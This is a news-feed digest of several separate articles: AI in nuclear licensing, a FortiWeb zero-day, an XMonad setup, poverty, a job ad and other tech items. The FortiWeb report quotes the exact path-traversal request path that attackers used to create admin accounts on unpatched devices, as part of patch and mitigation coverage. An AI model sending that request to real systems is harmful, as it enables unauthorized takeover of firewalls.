Tech companies are betting big on nuclear energy to meet AIs massive power demands and they're using that AI to speed up the construction of new nuclear power plants....
Original Article

Microsoft and nuclear power company Westinghouse Nuclear want to use AI to speed up the construction of new nuclear power plants in the United States. According to a report from think tank AI Now , this push could lead to disaster.

“If these initiatives continue to be pursued, their lack of safety may lead not only to catastrophic nuclear consequences, but also to an irreversible distrust within public perception of nuclear technologies that may inhibit the support of the nuclear sector as part of our global decarbonization efforts in the future,” the report said.

The construction of a nuclear plant involves a long legal and regulatory process called licensing that’s aimed at minimizing the risks of irradiating the public. Licensing is complicated and expensive but it’s also largely worked and nuclear accidents in the US are uncommon. But AI is driving a demand for energy and new players, mostly tech companies like Microsoft, are entering the nuclear field.

“Licensing is the single biggest bottleneck for getting new projects online,” a slide from a Microsoft presentation about using generative AI to fast track nuclear construction said. “10 years and $100 [million.]”

The presentation, which is archived on the website for the US Nuclear Regulatory Commission (the independent government agency that’s charged with setting standards for reactors and keeping the public safe), detailed how the company would use AI to speed up licensing. In the company’s conception, existing nuclear licensing documents and data about nuclear sites data would be used to train an LLM that’s then used to generate documents to speed up the process.

But the authors of the report from AI Now told 404 Media that they have major concerns about trusting nuclear safety to an LLM. “Nuclear licensing is a process, it’s not a set of documents,”  Heidy Khlaaf, the head AI scientist at the AI Now Institute and a co-author of the report, told 404 Media. “Which I think is the first flag in seeing proposals by Microsoft. They don’t understand what it means to have nuclear licensing.”

“Please draft a full Environmental Review for new project with these details,” Microsoft’s presentation imagines as a possible prompt for an AI licensing program. The AI would then send the completed draft to a human for review, who would use Copilot in a Word doc for “review and refinement.” At the end of Microsoft’s imagined process, it would have “Licensing documents created with reduced cost and time.”

The Idaho National Laboratory, a Department of Energy run nuclear lab, is already using Microsoft’s AI to “streamline” nuclear licensing. “INL will generate the engineering and safety analysis reports that are required to be submitted for construction permits and operating licenses for nuclear power plants,” INL said in a press release . Lloyd's Register, a UK-based maritime organization, is doing the same . American power company Westinghouse is marketing its own AI, called bertha , that promises to make the licensing process go from "months to minutes.”

The authors of the AI Now report worry that using AI to speed up the licensing process will bypass safety checks and lead to disaster. “Producing these highly structured licensing documents is not this box taking exercise as implied by these generative AI proposals that we're seeing,” Khlaaf told 404 Media. “The whole point of the lesson in process is to reason and understand the safety of the plant and to also use that process to explore the trade offs between the different approaches, the architectures, the safety designs, and to communicate to a regulator why that plant is safe. So when you use AI, it's not going to support these objectives, because it is not a set of documents or agreements, which I think you know, is kind of the myth that is now being put forward by these proposals.”

Sofia Guerra, Khlaaf’s co-author, agreed. Guerra is a career nuclear safety expert who has advised the U.S. Nuclear Regulatory Commission (NRC) and works with the International Atomic Energy Agency (IAEA) on the safe deployment of AI in nuclear applications. “This is really missing the point of licensing,” Guerra said of the push to use AI. “The licensing process is not perfect. It takes a long time and there’s a lot of iterations. Not everything is perfectly useful and targeted …but I think the process of doing that, in a way, is really the objective.”

Both Guerra and Khlaaf are proponents of nuclear energy, but worry that the proliferation of LLMs, the fast tracking of nuclear licenses, and the AI-driven push to build more plants is dangerous. “Nuclear energy is safe. It is safe, as we use it. But it’s safe because we make it safe and it’s safe because we spend a lot of time doing the licensing and we spend a lot of time learning from the things that go wrong and understanding where it went wrong and we try to address it next time,” Guerra said.

Law is another profession where people have attempted to use AI to streamline the process of writing complicated and involved technical documents. It hasn’t gone well . Lawyers who’ve attempted to write legal briefs have been caught, over and over again, in court. AI-constructed legal arguments cite precedents that do not exist, hallucinate cases, and generally foul up legal proceedings.

Might something similar happen if AI was used in nuclear licensing? “It could be something as simple as software and hardware version control,” Khlaaf said. “Typically in nuclear equipment, the supply chain is incredibly rigorous. Every component, every part, even when it was manufactured is accounted for. Large language models make these really minute mistakes that are hard to track. If you are off in the software version by a letter or a number, that can lead to a misunderstanding of which software version you have, what it entails, the expectation of the behavior of both the software and the hardware and from there, it can cascade into a much larger accident.”

Khlaaf pointed to Three Mile Island as an example of an entirely human-made accident that AI may replicate. The accident was a partial nuclear meltdown of a Pennsylvania reactor in 1979. “What happened is that you had some equipment failure and design flaws, and the operators misunderstood what those were due to a combination of a lack of training…that they did not have the correct indicators in their operating room,” Khlaaf said. “So it was an accident that was caused by a number of relatively minor equipment failures that cascaded. So you can imagine, if something this minor cascades quite easily, and you use a large language model and have a very small mistake in your design.”

In addition to the safety concerns, Khlaaf and Guerra told 404 Media that using sensitive nuclear data to train AI models increases the risk of nuclear proliferation. They pointed out that Microsoft is asking not only for historical NRC data but for real-time and project specific data. “This is a signal that AI providers are asking for nuclear secrets,” Khlaaf said. “To build a nuclear plant there is actually a lot of know-how that is not public knowledge…what’s available publicly versus what’s required to build a plant requires a lot of nuclear secrets that are not in the public domain.”

“This is a signal that AI providers are asking for nuclear secrets. To build a nuclear plant there is actually a lot of know-how that is not public knowledge…what’s available publicly versus what’s required to build a plant requires a lot of nuclear secrets that are not in the public domain.”

Tech companies maintain cloud servers that comply with federal regulations around secrecy and are sold to the US government. Anthropic and the National Nuclear Security Administration traded information across an Amazon Top Secret cloud server during a recent collaboration, and it’s likely that Microsoft and others would do something similar. Microsoft’s presentation on nuclear licensing references its own Azure Government cloud servers and notes that it’s compliant with Department of Energy regulations. 404 Media reached out to both Westinghouse Nuclear and Microsoft for this story. Microsoft declined to comment and Westinghouse did not respond.

“Where is this data going to end up and who is going to have the knowledge?” Guerra told 404 Media.

💡

Do you know anything else about this story? I would love to hear from you. Using a non-work device, you can message me securely on Signal at +1 347 762-9212 or send me an email at matthew@404media.co.

Nuclear is a dual use technology. You can use the knowledge of nuclear reactors to build a power plant or you can use it to build a nuclear weapon. The line between nukes for peace and nukes for war is porous. “The knowledge is analogous," Khlaaf said. “This is why we have very strict export controls, not just for the transfer of nuclear material but nuclear data.”

Proliferation concerns around nuclear energy are real. Fear that a nuclear energy program would become a nuclear weapons program was the justification the Trump administration used to bomb Iran earlier this year . And as part of the rush to produce more nuclear reactors and create infrastructure for AI, the White House has said it will begin selling old weapon-grade plutonium to the private sector for use in nuclear reactors.

Trump’s done a lot to make it easier for companies to build new nuclear reactors and use AI for licensing. The AI Now report pointed to a May 23, 2025 executive order that seeks to overhaul the NRC. The EO called for the NRC to reform its culture, reform its structure, and consult with the Pentagon and the Department of Energy as it navigated changing standards. The goal of the EO is to speed up the construction of reactors and get through the licensing process faster.

A different May 23 executive order made it clear why the White House wants to overhaul the NRC. “Advanced computing infrastructure for artificial intelligence (AI) capabilities and other mission capability resources at military and national security installations and national laboratories demands reliable, high-density power sources that cannot be disrupted by external threats or grid failures,” it said.

At the same time, the Department of Government Efficiency (DOGE) has gutted the NRC .  In September, members of the NRC told Congress they were worried they’d be fired if they didn’t approve nuclear reactor designs favored by the administration. “I think on any given day, I could be fired by the administration for reasons unknown,” Bradley Crowell, a commissioner at the NRC said in Congressional testimony . He also warned that DOGE driven staffing cuts would make it impossible to increase the construction of nuclear reactors while maintaining safety standards.

“The executive orders push the AI message. We’re not just seeing this idea of the rollback of nuclear regulation because we’re suddenly very excited about nuclear energy. We’re seeing it being done in service of AI,” Khlaaf said. “When you're looking at this rolling back of Nuclear Regulation and also this monopolization of nuclear energy to explicitly power AI, this raises a lot of serious concerns about whether the risk associated with nuclear facilities, in combination with the sort of these initiatives can be justified if they're not to the benefit of civil energy consumption.”

Matthew Wald, an independent nuclear energy analyst and former New York Times science journalist is more bullish on the use of AI in the nuclear energy field. Like Khlaaf, he also referenced the accident at Three Mile Island. “The tragedy of Three Mile Island was there was a badly designed control room, badly trained operators, and there was a control room indication that was very easy to misunderstand, and they misunderstood it, and it turned out that the same event had begun at another reactor. It was almost identical in Ohio, but that information was never shared, and the guys in Pennsylvania didn't know about it, so they wrecked a reactor,” Wald told 404 Media.

"AI is helpful, but let’s not get messianic about it.”

According to Wald, using AI to consolidate government databases full of nuclear regulatory information could have prevented that. “If you've got AI that can take data from one plant or from a set of plants, and it can arrange and organize that data in a way that's helpful to other plants, that's good news,” he said. “It could be good for safety. It could also just be good for efficiency. And certainly in licensing, it would be more efficient for both the licensee and the regulator if they had a clearer idea of precedent, of relevant other data.”

He also said that the nuclear industry is full of safety-minded engineers who triple check everything. “One of the virtues of people in this business is they are challenging and inquisitive and they want to check things. Whether or not they use computers as a tool, they’re still challenging and inquisitive and want to check things,” he said. “And I think anybody who uses AI unquestionably is asking for trouble, and I think the industry knows that…AI is helpful, but let’s not get messianic about it.”

But Khlaaf and Guerra are worried that the framing of nuclear power as a national security concern and the embrace of AI to speed up construction will setback the embrace of nuclear power. If nuclear isn’t safe, it’s not worth doing. “People seem to have lost sight of why nuclear regulation and safety thresholds exist to begin with. And the reason why nuclear risks, or civilian nuclear risk, were ever justified, was due to the capacity for nuclear power. To provide flexible civilian energy demands at low cost emissions in line with climate targets,” Khlaaf said.

“So when you move away from that…and you pull in the AI arms race into this cost benefit justification for risk proportionality, it leads government to sort of over index on these unproven benefits of AI as a reason to have nuclear risk, which ultimately undermines the risks of ionizing radiation to the general population, and also the increased risk of nuclear proliferation, which happens if you were to use AI like large language models in the licensing process.”

About the author

Matthew Gault is a writer covering weird tech, nuclear war, and video games. He’s worked for Reuters, Motherboard, and the New York Times.

Matthew Gault

Germany to Ban Huawei from Future 6G Network in Sovereignty Push

Hacker News
www.bloomberg.com
2025-11-14 17:19:08
Comments...
Original Article

We've detected unusual activity from your computer network

To continue, please click the box below to let us know you're not a robot.

Why did this happen?

Please make sure your browser supports JavaScript and cookies and that you are not blocking them from loading. For more information you can review our Terms of Service and Cookie Policy .

Need Help?

For inquiries related to this message please contact our support team and provide the reference ID below.

Block reference ID:8991b35c-c187-11f0-8777-b2a093c777d5

Get the most important global markets news at your fingertips with a Bloomberg.com subscription.

SUBSCRIBE NOW

Upcoming Speaking Engagements

Schneier
www.schneier.com
2025-11-14 17:08:57
This is a current list of where and when I am scheduled to speak: My coauthor Nathan E. Sanders and I are speaking at the Rayburn House Office Building in Washington, DC at noon ET on November 17, 2025. The event is hosted by the POPVOX Foundation and the topic is “AI and Congress: Practical Steps ...
Original Article

This is a current list of where and when I am scheduled to speak:

  • My coauthor Nathan E. Sanders and I are speaking at the Rayburn House Office Building in Washington, DC at noon ET on November 17, 2025. The event is hosted by the POPVOX Foundation and the topic is “ AI and Congress: Practical Steps to Govern and Prepare .”
  • I’m speaking on “Integrity and Trustworthy AI” at North Hennepin Community College in Brooklyn Park, Minnesota, USA, on Friday, November 21, 2025, at 2:00 PM CT. The event is cohosted by the college and The Twin Cities IEEE Computer Society.
  • Nathan E. Sanders and I will be speaking at the MIT Museum in Cambridge, Massachusetts, USA, on December 1, 2025, at 6:00 pm ET.
  • Nathan E. Sanders and I will be speaking at a virtual event hosted by City Lights on the Zoom platform, on December 3, 2025, at 6:00 PM PT.
  • I’m speaking and signing books at the Chicago Public Library in Chicago, Illinois, USA, on February 5, 2026. Details to come.

The list is maintained on this page .

Tags:

Posted on November 14, 2025 at 12:08 PM 0 Comments

Sidebar photo of Bruce Schneier by Joe MacInnis.

You misunderstand what it means to be poor

Hacker News
blog.ctms.me
2025-11-14 17:08:15
Comments...
Original Article

The more I speak about being poor, the more I realize how fundamentally other folks misunderstand what it means to be poor versus being broke. The advice folks will give comes from a good place. However, I would like to give some examples to help everyone understand most advice from non-poor folks isn’t helpful.

Everyone has experienced being broke. Being broke sucks. You are watching every dollar spent, finding wayys to trim or make things stretch until the next payday. The difference is when you are broke you have some money . You can afford to put gas in your car, but not enough to do that repair. Money is tight, but you can get the basics at the grocery store. You can’t afford to go to the movies, but will stay home and watch what’s new on Netflix. Being broke sucks. You are watching every dollar spent, finding ways to trim or make things stretch until the next payday.

When you are poor that next payday brings no relief. It is like an endless runner game. No matter how fast you run or how high you jump you can never see the finish line. No matter how tired you are the ground keeps moving. There is no room for errors as the punishment for mistakes is astronomical. When you hit an obstacle you don’t restart from the last checkpoint, you go back to the beginning.

There is this mindset from folks that poor people must not be smart. I mean, you’re smart and you’re not poor! The problem must be a skill issue! Learn the skills to do it yourself and you’ll be able to pull yourself up.

The other mindset is poor people are lazy. Quit complaining and do it yourself! Just get a better job! Get a second job! There’s money out there, you just have to go get it.

The last is these folks think they understand what it is like to be poor. Hey, I was a broke college student and I get being poor! I had a rough patch, it will pass.

Let’s start at the top.

I have a van that is falling apart. It needs a lot of work that we cannot afford to do. In the mindset that poor people are unskilled, it appears that I should watch some YouTube videos, get the parts, and do it myself. The misunderstanding is that being poor means you have tons and tons of skills. You have to fix everything yourself. There is never, I mean never, a time you can pay someone to fix it for you.

In this example folks think, “If the repair at the shop costs $1,000, but the parts cost $300, you can save a lot of money doing it yourself.” You are absolutely correct. Yet, I still need to be able to afford the $300 in parts.

Do you see the misunderstanding? I can’t make $300 appear out of thin air. I have the skills, I’ve had to fix all my cars myself. I’ve done complete engine rebuilds, I’ve replaced transmissions, I do all my own regular maintenance. The problem isn’t skills, its money . When you are broke, spending $300 instead of $1,000 sounds like a win because you can’t afford the $1,000. When you’re poor $300 might as well be $1,000 or $10,000, you will never afford it.

This is not a matter of time, either. I can’t put aside money each month and then get it. There is never money to put aside. I can’t put it on the credit card as I know I will never be able to pay it. I’ll just have this $300 debt looming over me, increasing with interest every month, mocking how much of a loser I am.

The second mindset: Being lazy.

How do I have the time to work multiple jobs when I’m doing all this extra work? How do I have the time when in my extra time I’m fixing cars, appliances, the roof, and cooking every meal from scratch?

Should I work a second job and never see my wife? My kids? Should I never have any personal time? Should my entire life revolve around money? Should I kill myself for capitalism?

Folks who say things like this have only ever experienced being broke. It is a temporary situation and a few months of extra income will solve the problem. Being poor is not missing $1,000 or $10,000 in the short term. It’s missing $40,000 a year, every year, forever. There is no short term relief. This isn’t a rough patch. It is The Pit in The Dark Knight Rises.

“There’s a reason why this prison is the worst hell on earth… Hope. Every man who has rotted here over the centuries has looked up to the light and imagined climbing to freedom. So easy… So simple… And like shipwrecked men turning to sea water from uncontrollable thirst, many have died trying. I learned here that there can be no true despair without hope.”

Yes, it is possible to escape. Hell, two people have done it! Why can’t you do it! But you are completely ignoring how many people have fallen to their death trying.

All of the general guidance to escape being poor is actually advice for getting through being broke.

  • Cancel Netflix
  • Make food at home
  • Stop going to Starbucks
  • Fix it yourself
  • Don’t upgrade your phone

These are all things that will help you temporarily . It will help you get through a short period of being broke. Or it will help you get your spending under control. You have enough money, you just don’t spend it wisely.

Being poor is you already did all those things. You cancelled all your streaming services years ago. You make all your food from scratch all the time. You never go to fucking Starbucks. You fix everything yourself. You already stretch everything to the limit. That is how you have to live every day of your life, for eternity, with no relief in sight.

Last example and is pertinent to our times in the US. A lot of poor folks are having to stand in line for hours and hours to get food at a food bank due to goverment ineptitude. The advice to simply cook at home doesn’t fix that there isn’t any food at home.

Do you honestly think people standing in line at a food bank could fix their situation if they stopped getting DoorDash? Going to Starbucks? Fuck off. They weren’t doing that already.

How are they to get another job or put in extra hours if they have to stand in line for 3 hours to get food? Should they go without food until they get that job and the paycheck?

You need to step aside and think about the differences between being broke and being poor.

- - - - -

Thank you for reading! If you would like to comment on this post you can start a conversation on the Fediverse. Message me on Mastodon at @cinimodev@masto.ctms.me . Or, you may email me at blog.discourse904@8alias.com . This is an intentionally masked email address that will be forwarded to the correct inbox.

Moving Back to a Tiling WM – XMonad

Hacker News
wssite.vercel.app
2025-11-14 17:04:49
Comments...
Original Article

Here are my dotfiles .

When I was still using Manjaro Linux back in 2019, I got a nudge to try i3wm . It was my first experience with any window manager. And I spent nearly 5 years with it, enjoying the absolute control over my workflow. Nearing the end of 2023, when I finally decided to leave Manjaro (for good), I had a bunch of options on my hand. Fedora looked really promising at that time. But even then, I wasn’t sure I was going to be using any tiling window manager. I happily switched to Gnome in Fedora 40. I ran it along with XOrg so that I could make my capslock key act as a ctrl when held and as an escape when pressed once, using setxkbmap and xcape . But only after spending a few months there, I realized I missed that finer control at my fingertips. So, I resumed searching for a newer tiling window manager. I was also learning Haskell at that time, so picking up XMonad was natural.

XMonad Fastfetch

There are a lot of things that I like about XMonad apart from its standard tiling manager features. I enjoy writing the configuration in Haskell. Where ever possible, I try to leverage the benefits of Haskell’s strong type system. Defining keybindings with a strong type system ensures that I cannot go very wrong with it. Using stack for building my configuration allows me to port the entire configuration easily to other systems, which are my various virtual machines. I have split configuration in various modules.

src
├── Keybindings.hs
├── Layout.hs
├── Plugins
│   ├── Bluetooth.hs
│   ├── Pomodoro.hs
│   └── Soundtrack.hs
├── Preferences.hs
├── Theme
│   ├── Dmenu.hs
│   ├── Font.hs
│   ├── Theme.hs
│   └── Xresources.hs
├── Workspaces.hs
├── xmobar.hs
└── xmonad.hs

3 directories, 13 files

If you want to poke around the config according to your needs, go through Preferences.hs . It contains lots of variables which can be customized like terminal emulator, browser, scratchpads, window gap size etc. It also contains a list of applications which you would like to start automatically at boot.

Overall, the modularization has turned out to be pretty in terms of categorizing things. I tried writing a few xmobar plugins for my own needs. The guide for writing them was straightforward to begin with. I also wrote my entire xmobar configuration in Haskell itself, keeping this executable in the same project. In the end, the project itself became a one-shot way for an entire desktop environment which I can easily clone, compile and install on any system.

1. Setup

I will go briefly over the stack-based setup. The only thing needed is to have a build script at the root of your xmonad project. Everything else is simply a normal stack project with modules and a few executables. I have 2 executables in my project: xmonad and xmobar.

A detailed description and example build files can be found here . My build script is simple enough.

#!/bin/sh

SRC_DIR=$HOME/.config/xmonad
WM=xmonad

unset STACK_YAML
FAIL=0

cd $SRC_DIR
stack install 2>.log || FAIL=1

ln -f -T $(stack exec -- which $WM) $1 2>.log || FAIL=2

2. Installation

XMonad Workflow

Stack is a package manager for Haskell projects and it will be used to compile the package. Install stack either via GHCup or your distribution’s package manager.

mkdir -p $HOME/.config/xmonad
git clone --branch release https://github.com/weirdsmiley/xmonad $HOME/.config/xmonad/
cd $HOME/.config/xmonad
./install.sh

The installation script will install a few fonts and other tools which are default for this setup. It will also write .xinitrc and .Xresources files.

After the installation is complete, and you are logged into xmonad, pressing alt+shift+/ or alt+? will open up a dialog box containing all available keybindings.

3. Diving in

3.1. Layouts and per-workspace layouts

XMonad provides a very easy way to describe various layouts that workspaces can follow. I found it useful to constrain only a few layouts on each workspace. I used PerWorkspace for this. This allows me to only switch between specified set of layouts. So for example, my workspace 2 is my writing workspace, in which I have 3 applications. A browser, a pdf reader and a terminal with a tmux session attached to it. This can simply be arranged as a three column layout. But sometimes certain pdfs may have smaller font size which can be tough to read in a column. If I zoom in the pdf it spills sideways, and I have to use arrow keys or h,l to move left and right.

Three column layout

To tackle this, I have another layout with added magnification on top of the three column layout. It magnifies the focused window by a certain limit. And having only these two layouts in my layout set helps me in easily cycling between layouts. I don’t have to skip through 4 different layouts which I would never use in this workspace.

Three column layout with magnification

3.2. Topbar modification

By default, XMonad adds a border to the tiled window which is in focus. I took this idea from here . This adds a title bar with formatted colors. This looks nicer that having a border surrounding the window. The focused window is colored blue while unfocused is colored black. Also, having the title names in topbar looks nice, and in a way removes the need of using XMonadLog’s application names in xmobar itself.

Window topbar

Window topbar unfocused

3.3. Type safety in keybindings

This is something which I truly adore about XMonad and writing its configuration in Haskell. I can write my keybindings in a functional manner and leverage Haskell’s type system to ensure safety. Arranging keybindings in this way, seems more fruitful than having them represented via strings.

myKeys :: XConfig Layout -> M.Map (KeyMask, KeySym) (X ())
myKeys conf@XConfig {XMonad.modMask = modm} =
  M.fromList -- list of keybindings
    $ [
      -- Restart XMonad
      ( (modm, xK_q), safeSpawn "xmonad" ["--restart"])
      -- Toggle fullscreen
      , ((modm, xK_f), sendMessage $ Toggle NBFULL)
      -- Lock screen
      , ((modm, xK_l), unGrab *> safeSpawn "env" myLockscreen)
      ]

Each keybinding is comprised of two values of types: KeyMask and KeySym , followed by an X () action. If you don’t want to set a keymask simply pass a 0 or noModMask .

3.4. Submap keybindings and makeChords

Using submaps in xmonad-contrib, I can write a utility function to easily generate a set of keybindings with an added description.

import XMonad.Actions.Submap
import qualified Data.Map as M

makeChords :: a -> [((KeyMask, KeySym), String, X ())] -> [(a, X ())]
makeChords majorKey subKeys =
  (majorKey, submap . M.fromList $ map ((k, _, a) -> (k, a)) subKeys)
    : [ ( majorKey
        , visualSubmap myVisualSubmapDef
            $ M.fromList
            $ map ((k, d, a) -> (k, (d, a))) subKeys)
      ]

soundChords modm =
  makeChords
    (modm, xK_a)
    [ ( (0, xK_a), "open alsamixer"
      , spawn $ myNamedTerminal "alsamixer" ++ " -e alsamixer")
    , ( (0, xK_m), "toggle music playing"
      , getRunningPlayer' >>= player ->
          spawn $ myMusicCtrl ++ " -p "" ++ player ++ "" play-pause")
    ]

myKeys conf@XConfig {XMonad.modMask = modm} =
  M.fromList $ [] ++ soundChords modm

The makeChords adds two distinct sets of keybindings, one normal set and another a visual set, which creates a dialog box when you press the main submap key. In the example above, the soundChords submap is enabled with alt+a , then you can see a dialog box containing two keybindings with their descriptions. Pressing either a or m will launch the first or the second action. The documentation also contains an example which you can read to see the actual code that will be appended to your myKeys.

My visual submap for soundChords

3.5. Xmobar configuration in Haskell

Writing the Xmobar configuration inside the same project really allows me to keep everything in one place. I create another executable alongside the xmonad executable, in my package.yaml . And then xmonad launches xmobar in the startup apps section.

executables:
  xmonad:
    main: xmonad.hs
    dependencies:
      - xmonad
      - xmonad-contrib
      - containers
  xmobar:
    main: xmobar.hs
    dependencies:
      - xmobar
    ghc-options: -rtsopts -threaded -with-rtsopts=-N

You may have noticed a small icon beside my layout icons on the left side of xmobar. The represent the current layout in a visual form. Try switching layouts with alt+space and see the icons change.

xmobar

myXmobarPP =
  def
    { ppLayout =
        case
          "Columns" -> "<icon=Columns.xpm/>"
          "MagnifiedColumns" -> "<icon=MagnifiedColumns.xpm/>"
          "Full" -> "<icon=Full.xpm/>"
          "Tall" -> "<icon=Tall.xpm/>"
          "ThreeCol" -> "<icon=MagnifiedColumns.xpm/>"
          "2-by-3 (left)" -> "<icon=TwoByThreeLeft.xpm/>"
          "2-by-3 (right)" -> "<icon=TwoByThreeRight.xpm/>"
          "2x3 LT" -> "<icon=TwoByThreeLeftWithTabs.xpm/>"
          "2x3 RT" -> "<icon=TwoByThreeRightWithTabs.xpm/>"
          "Tiled" -> "<icon=Tiled.xpm/>"
          _ -> "<icon=Unknown.xpm/>"
    }

main =
  xmonad
    . withEasySB (statusBarProp "xmobar" (pure myXmobarPP)) defToggleStrutsKey
    $ myConfig

3.6. Scratchpads in action

I am using 4 scratchpads in total. Each scratchpad is mapped to a keybinding.

  [
  -- Open Scratchpad
  ((modm, xK_Return), namedScratchpadAction myScratchpads "terminal")
  -- Open Kanboard session
  , ((modm, xK_x), namedScratchpadAction myScratchpads "Kanboard")
  -- Open CalibreWeb
  , ((modm, xK_z), namedScratchpadAction myScratchpads "CalibreWeb")
  -- Open Anki
  , ((modm, xK_m), namedScratchpadAction myScratchpads "Anki")
  ]

myScratchpads
 =
  [ NS "terminal" spawnTerm findTerm manageTerm
  , NS "Kanboard" spawnKanboard (className =? "Kanboard") doFullFloat
  , NS "Anki" spawnAnki (className =? "Anki") doFullFloat
  , NS "CalibreWeb" spawnCalibreWeb (className =? "CalibreWeb") doFullFloat
  ]
  ...

I realized that I don’t really open new terminals that often because I use tmux (with tmux-resurrect and tmux-continuum ). So I remapped alt+enter with showing the terminal scratchpad, instead of the usual, open a new terminal.

I can open up the calibre-web instance with alt+z , and immediately resume whatever I was reading.

Calibre-Web gif

If you have any questions for me, head over to this discussion page .

Fortinet confirms silent patch for FortiWeb zero-day exploited in attacks

Bleeping Computer
www.bleepingcomputer.com
2025-11-14 17:00:42
Fortinet has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now being widely exploited. [...]...
Original Article

Fortinet

Fortinet has confirmed that it has silently patched a critical zero-day vulnerability in its FortiWeb web application firewall, which is now " massively exploited in the wild."

The announcement follows reports of unauthenticated attackers exploiting an unknown FortiWeb path traversal flaw to create new administrative users on Internet-exposed devices.

The attacks were first identified by threat intel firm Defused on October 6, which published a proof-of-concept exploit and reported that an "unknown Fortinet exploit (possibly a CVE-2022-40684 variant)" is being used to send HTTP POST requests to the /api/v2.0/cmdb/system/admin%3f/../../../../../cgi-bin/fwbcgi Fortinet endpoint to create local admin-level accounts.

Wiz

On Thursday, watchTowr Labs security researchers also demoed an exploit and released a tool called " FortiWeb Authentication Bypass Artifact Generator to help defenders identify vulnerable devices.

Cybersecurity firm Rapid7 added that the flaw affects FortiWeb versions 8.0.1 and earlier, as it confirmed that the publicly available proof-of-concept exploit no longer works after updating to version 8.0.2.

Today, Fortinet disclosed that attackers are actively exploiting a path confusion vulnerability (now tracked as CVE-2025-64446) in FortiWeb's GUI component, which allows unauthenticated attackers to execute administrative commands on unpatched systems via crafted HTTP or HTTPS requests.

"Fortinet has observed this to be exploited in the wild," the company noted in a Friday security advisory , which confirmed that the zero-day has been silently patched in FortiWeb 8.0.2, released on October 28, three weeks after Defused's first report that the CVE-2025-64446 security flaw was being exploited in attacks.

Version Affected Solution
FortiWeb 8.0 8.0.0 through 8.0.1 Upgrade to 8.0.2 or above
FortiWeb 7.6 7.6.0 through 7.6.4 Upgrade to 7.6.5 or above
FortiWeb 7.4 7.4.0 through 7.4.9 Upgrade to 7.4.10 or above
FortiWeb 7.2 7.2.0 through 7.2.11 Upgrade to 7.2.12 or above
FortiWeb 7.0 7.0.0 through 7.0.11 Upgrade to 7.0.12 or above

Federal agencies ordered to patch within a week

CISA also added the CVE-2025-64446 path traversal flaw to its catalog of actively exploited vulnerabilities on Friday, ordering U.S. federal agencies to patch their systems by November 21 .

"This type of vulnerability is a frequent attack vector for malicious cyber actors and poses significant risks to the federal enterprise," the cybersecurity agency warned.

Admins who can't immediately upgrade to FortiWeb 8.0.2 should disable HTTP or HTTPS for all internet-facing management interfaces and ensure that access is restricted to trusted networks.

Fortinet also advised customers to check their configuration and review logs for new unauthorized administrator accounts and other unexpected modifications.

BleepingComputer contacted Fortinet with questions about these ongoing attacks, but we have yet to receive a response.

In August, Fortinet patched a critical command injection flaw (CVE-2025-25256) with publicly available exploit code in its FortiSIEM security monitoring solution, one day after cybersecurity company GreyNoise warned of a massive spike in brute-force attacks targeting Fortinet SSL VPNs .

Wiz

The 2026 CISO Budget Benchmark

It's budget season! Over 300 CISOs and security leaders have shared how they're planning, spending, and prioritizing for the year ahead. This report compiles their insights, allowing readers to benchmark strategies, identify emerging trends, and compare their priorities as they head into 2026.

Learn how top leaders are turning investment into measurable impact.

RetailReady (YC W24) Is Hiring

Hacker News
www.ycombinator.com
2025-11-14 17:00:19
Comments...
Original Article

An AI-powered supply chain compliance engine

Support Engineer

$100K - $140K 0.04% - 0.20% San Francisco, CA, US

Connect directly with founders of the best YC-funded startups.

Apply to role ›

About the role

Support Engineer

San Francisco - In Person

About RetailReady

We’re RetailReady (YC W24), an AI-powered supply chain compliance engine shaking up an antiquated (and yes, unsexy) industry. Since YC, we raised a $3.3M seed round and signed over 15 enterprise customers… we’re officially in scaling mode.

What We Build

RetailReady is the first AI-powered compliance engine designed for retail supply chains. We automate the messy web of compliance requirements between brands, warehouses, and retailers, turning weeks of manual work into minutes of automation. Our platform integrates deeply with warehouse operations and connects with customer systems via EDI, APIs, and flat files.

We don’t just build dashboards. We build the nervous system of compliance inside a warehouse.

The Role

We’re hiring a Support Engineer to be the first line of defense when issues arise. You’ll troubleshoot customer questions, diagnose technical issues, and flag deeper bugs for our on-call engineering team, keeping operations smooth across our growing customer base.

You’ll also help us scale smarter by documenting common issues and writing internal + customer-facing help articles to train our AI support model.

This is an in-person role in San Francisco with early hours (5 a.m. – 2 p.m.) to support our East Coast customers in real time.

What You’ll Do

  • Respond to and resolve customer issues in Slack, email, and in-app chat
  • Troubleshoot technical issues and identify whether they require escalation
  • Reproduce and document bugs for the on-call engineering team
  • Write clear help articles and process documentation to expand our AI support knowledge base
  • Track recurring support patterns and collaborate with product and engineering to eliminate them at the source

What We’re Looking For

  • Early riser, okay with 5 a.m. SF start and early finish
  • Obsessed with customer success and takes pride in fast, high-quality support
  • Analytical mindset… able to debug logs, APIs, and light data mapping
  • Detail-oriented and organized under pressure
  • Bonus : technical degree
  • Bonus : experience in supply chain
  • Bonus : experience writing or maintaining knowledge bases

Why Join Us Now

  • Ground-floor opportunity: Join a fast-growing YC-backed startup redefining supply chain tech
  • Real impact: Your work directly supports live warehouse operations across the U.S.
  • Collaborative team: Work alongside product, engineering, and implementation daily
  • Winning culture: We’re building a generational company - and we play to win

Location & Compensation

  • Location: San Francisco (in-person, 5 a.m. – 2 p.m. schedule)
  • Benefits: Full health coverage, unlimited PTO, latest equipment

Ready to Join?

If you’re an early riser who loves solving problems, thrives in fast-moving environments, and wants to help power the next generation of supply chain tech - we’d love to hear from you.

About the interview

  1. 15 minute interview with co-founder
  2. 45 minute support scenario panel
  3. Onsite with team
  4. Offer

About RetailReady

RetailReady is building an AI-powered supply chain compliance engine. Supply chains are still heavily reliant on paper processes and tribal knowledge, causing costly shipping mistakes that jeopardize the longevity of businesses. RetailReady is the first-to-market with our retail compliance packing software, leveraging camera vision to direct warehouses to ship orders without error. We are positioning our compliance data models to become the operating system that will power the next wave of warehouse robotics and automation.

RetailReady

Founded: 2024

Batch: W24

Team Size: 6

Status: Active

Founders

iPhone Pockets Sold Out Within Hours

Daring Fireball
www.macrumors.com
2025-11-14 16:53:18
We have no idea how many of them they made, but seemingly, the price was not a problem for this product.  ★  ...
Original Article

Apple recently teamed up with Japanese fashion brand ISSEY MIYAKE to create the iPhone Pocket , a limited-edition knitted accessory designed to carry an iPhone.

iPhone Pocket Short
iPhone Pocket is available to order on Apple's online store starting today, in the United States, France, China, Italy, Japan, Singapore, South Korea, and the United Kingdom. However, it is already completely sold out in the United States, and many size and color combinations are quickly running out in the other countries too.

The accessory can also be purchased at the following Apple Store locations, while supplies last:

  • Apple Canton Road, Hong Kong
  • Apple Ginza, Tokyo
